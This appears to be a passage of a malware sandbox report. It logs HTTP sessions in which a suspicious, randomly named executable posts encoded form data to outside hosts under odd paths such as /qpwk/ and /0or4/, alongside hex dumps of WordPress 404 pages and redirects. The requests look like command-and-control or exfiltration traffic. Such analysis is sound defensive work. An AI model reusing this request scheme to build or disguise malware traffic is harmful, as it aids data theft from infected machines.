                  Data Ascii: 11353<!DOCTYPE html><html lang="de-DE"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v23.1 - https://yoast.com/wordpress/plugins/seo/ --><meta property="og:locale" content="de_DE" /><meta property="og:title" content="Seite wurde nicht gefunden. - Anai Dittrich Art, Design, Care" /><meta property="og:site_name" content="Anai Dittrich Art, Design, Care" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"http://anaidittrich.com/#website","url":"http://anaidittrich.com/","name":"Anai Dittrich Art, Design, Care","description":"Mindful design and art projects","potentialAction":[{"@type":"SearchAction","target":{"@
                  Sep 4, 2024 09:38:02.416076899 CEST1236INData Raw: 74 79 70 65 22 3a 22 45 6e 74 72 79 50 6f 69 6e 74 22 2c 22 75 72 6c 54 65 6d 70 6c 61 74 65 22 3a 22 68 74 74 70 3a 2f 2f 61 6e 61 69 64 69 74 74 72 69 63 68 2e 63 6f 6d 2f 3f 73 3d 7b 73 65 61 72 63 68 5f 74 65 72 6d 5f 73 74 72 69 6e 67 7d 22
                  Data Ascii: type":"EntryPoint","urlTemplate":"http://anaidittrich.com/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"de-DE"}]}</script>... / Yoast SEO plugin. --><title>Seite wurde nicht gefunden. - Anai D
                  Sep 4, 2024 09:38:02.416088104 CEST1236INData Raw: 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2e 64 61 74 61 29 2c 72 3d 28 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c
                  Data Ascii: 32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(function(e,t){return
                  Sep 4, 2024 09:38:02.416157007 CEST672INData Raw: 69 6e 67 3a 21 30 2c 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3a 21 30 7d 2c 65 3d 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43
                  Data Ascii: ing:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.t
                  Sep 4, 2024 09:38:02.416169882 CEST1236INData Raw: 72 6b 65 72 28 55 52 4c 2e 63 72 65 61 74 65 4f 62 6a 65 63 74 55 52 4c 28 72 29 2c 7b 6e 61 6d 65 3a 22 77 70 54 65 73 74 45 6d 6f 6a 69 53 75 70 70 6f 72 74 73 22 7d 29 3b 72 65 74 75 72 6e 20 76 6f 69 64 28 61 2e 6f 6e 6d 65 73 73 61 67 65 3d
                  Data Ascii: rker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.e
                  Sep 4, 2024 09:38:02.416179895 CEST1236INData Raw: 39 39 39 39 70 78 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 62 6c 6f 63 6b 2d 73 69 74 65 2d 74 69 74 6c 65 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 3a 72 6f 6f 74 20 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63
                  Data Ascii: 9999px}</style><style id='wp-block-site-title-inline-css'>:root :where(.wp-block-site-title a){color:inherit}</style><style id='wp-block-group-inline-css'>.wp-block-group{box-sizing:border-box}:where(.wp-block-group.wp-block-group-is-lay
                  Sep 4, 2024 09:38:02.416191101 CEST1236INData Raw: 3d 77 72 69 74 69 6e 67 2d 6d 6f 64 65 5d 3a 77 68 65 72 65 28 5b 73 74 79 6c 65 2a 3d 76 65 72 74 69 63 61 6c 2d 6c 72 5d 29 2c 68 31 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 72 69 67 68 74 5b 73 74 79 6c 65 2a 3d 77 72 69 74 69 6e 67 2d
                  Data Ascii: =writing-mode]:where([style*=vertical-lr]),h1.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h2.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h2.has-text-align-right[style*=writing-mode]:where([sty
                  Sep 4, 2024 09:38:02.416203022 CEST1236INData Raw: 2e 36 38 34 68 31 2e 37 33 37 5a 27 29 3b 0a 09 09 09 09 09 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 09 09 09 7d 0a 0a 09 09 09 09 2f 2a 20 48 69 64 65 20 74 68 65 20 61 73 74 65 72 69 73 6b 20 69 66 20 74 68 65 20 68 65 61 64 69 6e 67
                  Data Ascii: .684h1.737Z');display: block;}/* Hide the asterisk if the heading has no content, to avoid using empty headings to display the asterisk only, which is an A11Y issue */.is-style-asterisk:empty:before {content: none;
                  Sep 4, 2024 09:38:02.416213036 CEST1236INData Raw: 72 69 67 68 74 5b 73 74 79 6c 65 2a 3d 22 77 72 69 74 69 6e 67 2d 6d 6f 64 65 3a 76 65 72 74 69 63 61 6c 2d 72 6c 22 5d 7b 72 6f 74 61 74 65 3a 31 38 30 64 65 67 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 62 6c 6f
                  Data Ascii: right[style*="writing-mode:vertical-rl"]{rotate:180deg}</style><style id='wp-block-search-inline-css'>.wp-block-search__button{margin-left:10px;word-break:normal}.wp-block-search__button.has-icon{line-height:0}.wp-block-search__button svg{h
                  Sep 4, 2024 09:38:02.416224003 CEST1236INData Raw: 68 5f 5f 73 65 61 72 63 68 66 69 65 6c 64 2d 68 69 64 64 65 6e 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 62 75 74 74 6f 6e 2d 6f 6e 6c 79 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63
                  Data Ascii: h__searchfield-hidden,.wp-block-search.wp-block-search__button-only.wp-block-search__searchfield-hidden .wp-block-search__inside-wrapper{overflow:hidden}.wp-block-search.wp-block-search__button-only.wp-block-search__searchfield-hidden .wp-bloc
                  Sep 4, 2024 09:38:02.416235924 CEST1236INData Raw: 6c 6f 63 6b 2d 73 65 61 72 63 68 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 62 75 74 74 6f 6e 2d 6f 6e 6c 79 20 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 69 6e 73 69 64 65 2d 77 72 61 70 70 65 72 7b 66 6c 6f 61 74 3a 72 69
                  Data Ascii: lock-search.wp-block-search__button-only .wp-block-search__inside-wrapper{float:right}</style><style id='wp-block-columns-inline-css'>.wp-block-columns{align-items:normal!important;box-sizing:border-box;display:flex;flex-wrap:wrap!important


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  35192.168.2.449772162.55.254.209805440C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  TimestampBytes transferredDirectionData
                  Sep 4, 2024 09:38:04.207552910 CEST10859OUTPOST /qpwk/ HTTP/1.1
                  Host: www.anaidittrich.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.anaidittrich.com
                  Referer: http://www.anaidittrich.com/qpwk/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 10301
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Raw: 35 36 67 44 3d 43 6c 55 75 47 44 75 77 54 30 33 36 78 45 75 47 4c 73 73 42 4d 62 67 5a 76 72 53 34 57 4f 2b 46 54 66 35 34 52 48 36 53 6f 69 35 6f 66 49 64 2b 50 56 50 6e 67 39 5a 55 4e 71 48 64 4a 6c 76 70 38 6b 39 53 6f 37 71 78 7a 79 31 46 43 72 53 6e 31 55 2f 4c 6e 75 6c 78 44 49 38 2b 4b 71 31 37 49 64 51 47 2b 43 55 6b 36 76 58 71 4d 43 42 6b 4b 75 42 30 2f 4d 57 4e 4a 31 4f 68 71 45 47 4d 76 74 6c 63 46 47 66 61 6f 76 45 30 53 4d 56 53 62 31 6b 37 33 4c 6b 50 37 32 65 36 33 70 49 4a 6c 45 61 6d 63 38 36 4b 72 73 70 78 62 59 6a 4b 32 51 49 2b 48 6c 32 72 49 37 69 71 42 4f 4c 47 30 37 6a 63 4f 57 7a 51 52 45 63 6b 47 4a 36 62 41 38 35 78 77 67 68 65 76 65 75 37 65 72 79 31 57 6d 6b 43 59 41 45 6d 68 4b 59 30 5a 32 4a 2f 66 6d 44 32 69 73 75 5a 31 54 62 2b 36 71 72 53 6f 4a 79 51 4b 31 32 4c 74 49 49 6f 51 71 48 56 6f 42 70 53 79 58 63 2b 6f 50 52 66 71 44 34 30 39 6b 79 38 36 4c 4f 43 58 52 68 57 57 77 33 56 69 75 69 62 50 59 77 54 6b 36 4e 43 4e 30 30 73 49 48 5a 56 69 56 38 30 2b 34 31 5a 37 [TRUNCATED]
                  Data Ascii: 56gD=ClUuGDuwT036xEuGLssBMbgZvrS4WO+FTf54RH6Soi5ofId+PVPng9ZUNqHdJlvp8k9So7qxzy1FCrSn1U/LnulxDI8+Kq17IdQG+CUk6vXqMCBkKuB0/MWNJ1OhqEGMvtlcFGfaovE0SMVSb1k73LkP72e63pIJlEamc86KrspxbYjK2QI+Hl2rI7iqBOLG07jcOWzQREckGJ6bA85xwgheveu7ery1WmkCYAEmhKY0Z2J/fmD2isuZ1Tb+6qrSoJyQK12LtIIoQqHVoBpSyXc+oPRfqD409ky86LOCXRhWWw3ViuibPYwTk6NCN00sIHZViV80+41Z7p7XDuuiKjgNWL44ASCG4MQL97TOp5YowKnTi2+vw+eZ3gbNRCYkogH66pJ+XUbTgwny+e6wuFU3lNG+VxikSkiP3izlcuPhaH92SvGVPpr5xxegSkx4xt2FohIBs4tpK/Anrk/Ph+cTKYEnwGu3sCQI1XPEs8qTFLF1H9UFrFUlOtxA+DbP4xeBrTWg+PVlm3uf/xuq4PGixaarVlg9OpqyFp91yI/FTbdS+4F8ChOGTs24O0nN9GWFPY3VG2SYh1/zjGkFBYZxTU7pltXV7ZXxTqED2Oj5OS9FRVZXnu+xVg2kVxIuiV6gbbM471OLC4vsQUmJ4b67cN1jxxWRbpKA3Lw3Kg14jmz1zQTz4sFvS29HrPEkgZs4tlPucelAqWspb8OEC2UkvpbjcbmzR9DldwW2ObLj6tBgZ28wiPLTOM6ivKQtcJ6ZLU15bPwBM/9oDTXJbsS8PJ4GXYO2NMLMow6MpokA+eBWw9Lz+PRO1L2CtyMD30sM/X9ffAjl6OiKuEOD03yTA1IbaiUcB2vFG3PMsJM4jjf2K3s2ZZNyx11XVAyHjpBC3HFvLsziwCZeE4+zx4orCli0pzck+7pSgiPnLLd2ep45fFyFDCx6t4YBBE1cLG3Sk1zJcTW7qPkkhWUza2Z9RNks7ORr/+D/aAKF8dODelk [TRUNCATED]
                  Sep 4, 2024 09:38:05.124836922 CEST1236INHTTP/1.1 404 Not Found
                  Date: Wed, 04 Sep 2024 07:38:04 GMT
                  Server: Apache
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  Link: <http://anaidittrich.com/wp-json/>; rel="https://api.w.org/"
                  Upgrade: h2c
                  Connection: Upgrade, close
                  Transfer-Encoding: chunked
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 31 31 33 35 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 32 33 2e 31 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 [TRUNCATED]
                  Data Ascii: 11353<!DOCTYPE html><html lang="de-DE"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v23.1 - https://yoast.com/wordpress/plugins/seo/ --><meta property="og:locale" content="de_DE" /><meta property="og:title" content="Seite wurde nicht gefunden. - Anai Dittrich Art, Design, Care" /><meta property="og:site_name" content="Anai Dittrich Art, Design, Care" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"http://anaidittrich.com/#website","url":"http://anaidittrich.com/","name":"Anai Dittrich Art, Design, Care","description":"Mindful design and art projects","potentialAction":[{"@type":"SearchAction","target":{"@
                  Sep 4, 2024 09:38:05.124869108 CEST224INData Raw: 74 79 70 65 22 3a 22 45 6e 74 72 79 50 6f 69 6e 74 22 2c 22 75 72 6c 54 65 6d 70 6c 61 74 65 22 3a 22 68 74 74 70 3a 2f 2f 61 6e 61 69 64 69 74 74 72 69 63 68 2e 63 6f 6d 2f 3f 73 3d 7b 73 65 61 72 63 68 5f 74 65 72 6d 5f 73 74 72 69 6e 67 7d 22
                  Data Ascii: type":"EntryPoint","urlTemplate":"http://anaidittrich.com/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"de-DE"}]}</script>... / Yoast SEO plugin. --><title>Seite wurde nicht
                  Sep 4, 2024 09:38:05.124877930 CEST1236INData Raw: 20 67 65 66 75 6e 64 65 6e 2e 20 2d 20 41 6e 61 69 20 44 69 74 74 72 69 63 68 20 e2 80 93 20 41 72 74 2c 20 44 65 73 69 67 6e 2c 20 43 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20
                  Data Ascii: gefunden. - Anai Dittrich Art, Design, Care</title><link rel='dns-prefetch' href='//anaidittrich.com' /><link rel="alternate" type="application/rss+xml" title="Anai Dittrich Art, Design, Care &raquo; Feed" href="http://anaidittrich.
                  Sep 4, 2024 09:38:05.125013113 CEST1236INData Raw: 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 3d 3d 3d 72 5b 74 5d 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 75 28 65 2c 74 2c 6e 29 7b 73 77 69 74 63 68 28 74 29 7b 63 61 73 65 22 66 6c 61 67 22 3a 72 65 74 75 72 6e 20 6e 28 65 2c 22
                  Data Ascii: unction(e,t){return e===r[t]})}function u(e,t,n){switch(t){case"flag":return n(e,"\ud83c\udff3\ufe0f\u200d\u26a7\ufe0f","\ud83c\udff3\ufe0f\u200b\u26a7\ufe0f")?!1:!n(e,"\ud83c\uddfa\ud83c\uddf3","\ud83c\uddfa\u200b\ud83c\uddf3")&&!n(e,"\ud83c\
                  Sep 4, 2024 09:38:05.125025034 CEST1236INData Raw: 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 65 2e 74 69 6d 65 73 74 61 6d 70 26 26 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 3c 65 2e 74 69 6d 65 73 74 61 6d 70 2b 36 30 34 38 30 30 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79
                  Data Ascii: number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"undefined"!=typeof OffscreenCanvas&&"undefined"!=typeof
                  Sep 4, 2024 09:38:05.125036955 CEST1236INData Raw: 3e 0a 2e 77 70 2d 62 6c 6f 63 6b 2d 73 69 74 65 2d 6c 6f 67 6f 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 30 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 69 74 65 2d 6c 6f 67 6f 20 61 7b 64 69
                  Data Ascii: >.wp-block-site-logo{box-sizing:border-box;line-height:0}.wp-block-site-logo a{display:inline-block;line-height:0}.wp-block-site-logo.is-default-size img{height:auto;width:120px}.wp-block-site-logo img{height:auto;max-width:100%}.wp-block-sit
                  Sep 4, 2024 09:38:05.125052929 CEST896INData Raw: 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 0a 09 09 09 09 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 09 09 09 09 09 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 09 09
                  Data Ascii: vertical-align: middle;text-decoration: none;display: inline-block;}</style><link rel='stylesheet' id='wp-block-navigation-css' href='http://anaidittrich.com/wp-includes/blocks/navigation/style.min.css?ver=6.6.1' media='all'
                  Sep 4, 2024 09:38:05.125092983 CEST1236INData Raw: 5d 3a 77 68 65 72 65 28 5b 73 74 79 6c 65 2a 3d 76 65 72 74 69 63 61 6c 2d 6c 72 5d 29 2c 68 34 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 72 69 67 68 74 5b 73 74 79 6c 65 2a 3d 77 72 69 74 69 6e 67 2d 6d 6f 64 65 5d 3a 77 68 65 72 65 28 5b
                  Data Ascii: ]:where([style*=vertical-lr]),h4.has-text-align-right[style*=writing-mode]:where([style*=vertical-rl]),h5.has-text-align-left[style*=writing-mode]:where([style*=vertical-lr]),h5.has-text-align-right[style*=writing-mode]:where([style*=vertical-
                  Sep 4, 2024 09:38:05.125102997 CEST1236INData Raw: 6e 2d 72 69 67 68 74 3a 62 65 66 6f 72 65 20 7b 0a 09 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 7d 0a 0a 09 09 09 09 2e 72 74 6c 20 2e 69 73 2d 73 74 79 6c 65 2d 61 73 74 65 72 69 73 6b 2e 68 61 73 2d 74 65
                  Data Ascii: n-right:before {margin-left: auto;}.rtl .is-style-asterisk.has-text-align-left:before {margin-right: auto;}</style><style id='wp-block-paragraph-inline-css'>.is-small-text{font-size:.875em}.is-regular-text{font-s
                  Sep 4, 2024 09:38:05.125112057 CEST1236INData Raw: 72 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 61 75 74 6f 3b 66 6c 65 78 2d 77 72 61 70 3a 6e 6f 77 72 61 70 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 6c 61 62 65 6c 7b 77
                  Data Ascii: r{display:flex;flex:auto;flex-wrap:nowrap;max-width:100%}.wp-block-search__label{width:100%}.wp-block-search__input{appearance:none;border:1px solid #949494;flex-grow:1;margin-left:0;margin-right:0;min-width:3rem;padding:8px;text-decoration:un
                  Sep 4, 2024 09:38:05.125497103 CEST1236INData Raw: 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 69 6e 70 75 74 29 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 69 6e 68 65
                  Data Ascii: ere(.wp-block-search__input){font-family:inherit;font-size:inherit;font-style:inherit;font-weight:inherit;letter-spacing:inherit;line-height:inherit;text-transform:inherit}:where(.wp-block-search__button-inside .wp-block-search__inside-wrapper


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  36192.168.2.449773162.55.254.209805440C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  TimestampBytes transferredDirectionData
                  Sep 4, 2024 09:38:06.743510962 CEST485OUTGET /qpwk/?56gD=Pn8OF1j/flre3VebOMg2UbcWr5CJafCXadgaNymjhjlyVvhoWwCe/sZUerDBeXD1/Dp7mYeP8BtJLpf3hF/3n4t4NMFgDvNRYoQEyTx0vs+6FBV4KM09ubA=&gTSpc=Khb8pT HTTP/1.1
                  Host: www.anaidittrich.com
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Connection: close
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Sep 4, 2024 09:38:07.401604891 CEST487INHTTP/1.1 301 Moved Permanently
                  Date: Wed, 04 Sep 2024 07:38:07 GMT
                  Server: Apache
                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                  Cache-Control: no-cache, must-revalidate, max-age=0
                  X-Redirect-By: WordPress
                  Upgrade: h2c
                  Connection: Upgrade, close
                  Location: http://anaidittrich.com/qpwk/?56gD=Pn8OF1j/flre3VebOMg2UbcWr5CJafCXadgaNymjhjlyVvhoWwCe/sZUerDBeXD1/Dp7mYeP8BtJLpf3hF/3n4t4NMFgDvNRYoQEyTx0vs+6FBV4KM09ubA=&gTSpc=Khb8pT
                  Content-Length: 0
                  Content-Type: text/html; charset=UTF-8


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  37192.168.2.44977464.64.237.133805440C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  TimestampBytes transferredDirectionData
                  Sep 4, 2024 09:38:12.932461977 CEST748OUTPOST /0or4/ HTTP/1.1
                  Host: www.551108k5.shop
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.551108k5.shop
                  Referer: http://www.551108k5.shop/0or4/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 201
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Raw: 35 36 67 44 3d 4e 72 56 33 57 58 75 6d 4b 45 59 72 49 62 75 6d 6c 6c 56 63 55 71 48 43 79 72 2b 45 5a 79 66 30 72 70 73 38 68 52 5a 35 71 5a 53 76 52 30 6d 34 42 4a 35 73 59 36 54 73 63 53 67 6e 4a 4b 68 65 50 59 56 70 5a 61 62 50 36 6b 4b 74 71 64 2f 4a 64 50 54 47 4d 78 6c 4f 52 75 57 53 6f 6b 73 68 62 67 41 70 63 4a 61 4e 2b 75 54 58 73 54 73 72 48 73 39 47 7a 38 56 4b 37 72 34 51 44 62 45 56 39 69 56 75 47 2f 36 69 77 45 53 74 46 66 4a 67 50 56 37 70 48 41 43 65 6f 70 68 77 54 5a 6f 68 65 52 37 57 4e 32 51 77 5a 52 6b 43 65 75 69 61 45 74 61 37 45 4e 6c 62 6b 32 61 4f 71 7a 68 73 71 67 3d 3d
                  Data Ascii: 56gD=NrV3WXumKEYrIbumllVcUqHCyr+EZyf0rps8hRZ5qZSvR0m4BJ5sY6TscSgnJKhePYVpZabP6kKtqd/JdPTGMxlORuWSokshbgApcJaN+uTXsTsrHs9Gz8VK7r4QDbEV9iVuG/6iwEStFfJgPV7pHACeophwTZoheR7WN2QwZRkCeuiaEta7ENlbk2aOqzhsqg==
                  Sep 4, 2024 09:38:13.501923084 CEST401INHTTP/1.1 301 Moved Permanently
                  Server: nginx
                  Date: Wed, 04 Sep 2024 07:38:13 GMT
                  Content-Type: text/html
                  Content-Length: 162
                  Connection: close
                  Location: https://www.551108k5.shop/0or4/
                  Strict-Transport-Security: max-age=31536000
                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  38192.168.2.44977564.64.237.133805440C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  TimestampBytes transferredDirectionData
                  Sep 4, 2024 09:38:15.647413969 CEST768OUTPOST /0or4/ HTTP/1.1
                  Host: www.551108k5.shop
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.551108k5.shop
                  Referer: http://www.551108k5.shop/0or4/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 221
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Raw: 35 36 67 44 3d 4e 72 56 33 57 58 75 6d 4b 45 59 72 4a 37 65 6d 6e 47 4e 63 54 4b 48 64 33 72 2b 45 51 53 66 77 72 6f 51 38 68 51 74 50 71 4c 32 76 52 57 2b 34 41 4b 68 73 66 36 54 73 4a 69 67 6f 55 61 68 52 50 59 59 63 5a 62 6e 50 36 67 69 74 71 66 6e 4a 63 34 48 48 4d 68 6c 32 49 2b 57 63 31 30 73 68 62 67 41 70 63 49 71 6a 2b 75 37 58 74 69 63 72 47 49 70 4a 36 63 56 4e 73 62 34 51 53 4c 46 63 39 69 56 4d 47 2b 6e 46 77 47 71 74 46 64 42 67 50 68 6e 71 65 77 43 63 6c 4a 67 63 64 4d 56 31 52 43 57 59 49 6c 77 70 63 67 34 59 57 49 7a 41 56 63 37 73 57 4e 42 6f 35 78 54 36 6e 77 63 6c 78 6e 41 47 35 6c 58 79 6e 2f 53 63 61 49 6f 59 2f 68 54 61 4a 42 77 3d
                  Data Ascii: 56gD=NrV3WXumKEYrJ7emnGNcTKHd3r+EQSfwroQ8hQtPqL2vRW+4AKhsf6TsJigoUahRPYYcZbnP6gitqfnJc4HHMhl2I+Wc10shbgApcIqj+u7XticrGIpJ6cVNsb4QSLFc9iVMG+nFwGqtFdBgPhnqewCclJgcdMV1RCWYIlwpcg4YWIzAVc7sWNBo5xT6nwclxnAG5lXyn/ScaIoY/hTaJBw=
                  Sep 4, 2024 09:38:16.370214939 CEST401INHTTP/1.1 301 Moved Permanently
                  Server: nginx
                  Date: Wed, 04 Sep 2024 07:38:16 GMT
